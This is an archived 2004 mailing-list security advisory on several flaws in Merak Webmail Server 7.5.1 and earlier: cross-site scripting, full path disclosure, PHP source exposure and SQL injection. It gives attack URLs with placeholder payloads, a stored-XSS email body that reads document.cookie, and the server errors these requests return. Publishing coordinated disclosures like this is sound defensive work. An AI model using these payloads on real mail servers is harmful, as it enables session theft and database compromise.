[NT] Merak Webmail Server Multiple Vulnerabilities
From: SecuriTeam (support_at_securiteam.com)
Date: 08/19/04
- Previous message: SecuriTeam: "[NEWS] Cisco IOS Malformed OSPF Packet Causes Reload"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 19 Aug 2004 11:32:20 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Merak Webmail Server Multiple Vulnerabilities
------------------------------------------------------------------------
SUMMARY
<http://www.merakmailserver.com/Products/Webmail_Server_Software/> Merak
Webmail Server Software "provides users with the ability to access their
email via a browser using an 'Outlook 2002 or 2003' style interface as
well as many others, or via their Wireless WAP-enabled device". The Merak
Webmail Server has been found to contain multiple vulnerabilities ranging
from Cross-Site Scripting issues, Full path disclosure, exposure of PHP
files, to SQL-Injections.
DETAILS
Vulnerable Systems:
* Merak Mail Server version 7.5.1 and prior
Immune Systems:
* Merak Mail Server version 7.5.2 or newer
Cross-Site Scripting:
There are many input validation holes in the Merak Webmail server. An
attacker can perform using these holes an XSS attack.
Examples:
/address.html?id=[id]&sort=name&selectsort=&global=&showgroups=&showlite=&category=">[XSS]&cserver=&ext=
/address.html?id=[id]&sort=name&selectsort=&global=&showgroups=&showlite=&category=&cserver=">[XSS]&ext=
/address.html?id=[id]&sort=name&selectsort=&global=&showgroups=&showlite=&category=&cserver=&ext=">[XSS]
/address.html?id=[id]&sort=&selectsort=&global=">[XSS]&showgroups=&showlite=&category=&cserver=&ext=
/address.html?id=[id]&sort=&selectsort=&global=&showgroups=">[XSS]&showlite=&category=&cserver=&ext=
/address.html?id=[id]&sort=&selectsort=&global=&showgroups=&showlite=">[XSS]&category=&cserver=&ext=
/settings.html?autoresponder=1&id=[id]&spage=">[XSS]
/settings.html?autoresponder=">[XSS]&id=[id]&spage=0
/readmail.html?id=[id]&folder=">[XSS]
The next files (attachment.html, calendar.html), can be accessed without
knowing user's session ID number, making it easier to use them for
exploitation:
/attachment.html?attachmentpage_text_error=">[XSS]
/calendar.html?id=1&schedule=admin%40merakdemo.com&cv=n&folder=">[XSS]
/calendar.html?id=1&schedule=koko%40merakdemo.com&sf=addevent&cv=d&ct=">[XSS]
/calendar.html?id=[id]&cv=">[XSS]&ct=[ct]&sf=addevent&ESdhour=8
It is possible to inject a XSS in messages.
Example:
Open your mail and write a new message of the sorts of:
< IMG alt="" hspace=0 src="javascript:alert(document.cookie)"
align=baseline border=0>< IFRAME src="http://www.google.com"></body>
</html> </IFRAME>
Click on the HTML message checkbox (in order to send it in HTML format).
The XSS will be executed on your browser. If you send the message, the XSS
will be also executed once the victim reads the email.
Full Path Disclosure
Some variables of adress.html can cause that a remote user may be able to
determine the installation path.
Example:
Accessing the following URL:
/mail/address.html?id=[id]&sort=criolabs&selectsort=criolabs&global=criolabs&showlite=criolabs&category=criolabs&cserver=&ext=, will return:
Warning: reset(): Passed variable is not an array or object in C:\Archivos
de programa\Merak\html\mail\address.html on line 565
Warning: Variable passed to each() is not an array or object in
C:\Archivos de programa\Merak\html\mail\address.html on line 566
Warning: reset(): Passed variable is not an array or object in C:\Archivos
de programa\Merak\html\mail\inc\function.address.php on line 100
Warning: Variable passed to each() is not an array or object in
C:\Archivos de programa\Merak\html\mail\inc\function.address.php on line
101
Another example is to access the following URL:
/calendar.html?id=6213dcc45fdbccc9af207d32722b93a7&cv=%22criolabs&ct='criolabs&sf='criolabs, which will return:
Warning: mktime(): Windows does not support negative values for this
function in C:\Archivos de
programa\Merak\html\mail\inc\function.calendar.php on line 413
Warning: date(): Windows does not support dates prior to midnight
(00:00:00), January 1, 1970 in C:\Archivos de
programa\Merak\html\mail\inc\function.calendar.php on line 413
Warning: mktime(): Windows does not support negative values for this
function in C:\Archivos de
programa\Merak\html\mail\inc\function.calendar.php on line 417
Warning: mktime(): Windows does not support negative values for this
function in C:\Archivos de
programa\Merak\html\mail\inc\function.calendar.php on line 420
Warning: date(): Windows does not support dates prior to midnight
(00:00:00), January 1, 1970 in C:\Archivos de
programa\Merak\html\mail\inc\function.calendar.php on line 420
Warning: date(): Windows does not support dates prior to midnight
(00:00:00), January 1, 1970 in C:\Archivos de
programa\Merak\html\mail\inc\function.calendar.php on line 350
Exposure of PHP Files:
The server allows a remote user to download any PHP file from the server.
Normally web servers will execute the content found in the PHP file
instead of allow their download.
Examples:
http://localhost:32000/mail/inc/function.php
http://localhost:32000/mail/inc/function.view.php
SQL Injection:
There are numerous SQL Injection vulnerabilities in the calendar.html.
These SQL injection vulnerabilities allow a remote user to inject
arbitrary SQL commands.
Examples:
/calendar.html?id=1'&schedule=[SQL]
/calendar.html?id=1&schedule=koko%40merakdemo.com&sf=addevent&cv=d&ct=';'&Eid=criolabs'
Disclosure Timeline:
Vendor Contacted: Wed, 04 Aug 2004
Thu, 12 Aug 2004: Release of Merak Mail Server 7.5.2
Solution:
Download the new release available at:
<http://www.MerakMailServer.com/Download/>
http://www.MerakMailServer.com/Download/.
ADDITIONAL INFORMATION
The information has been provided by Criolabs staff.
The original article can be found at:
<http://www.criolabs.net/advisories/Merak.txt>
http://www.criolabs.net/advisories/Merak.txt
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[NEWS] Cisco IOS Malformed OSPF Packet Causes Reload"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|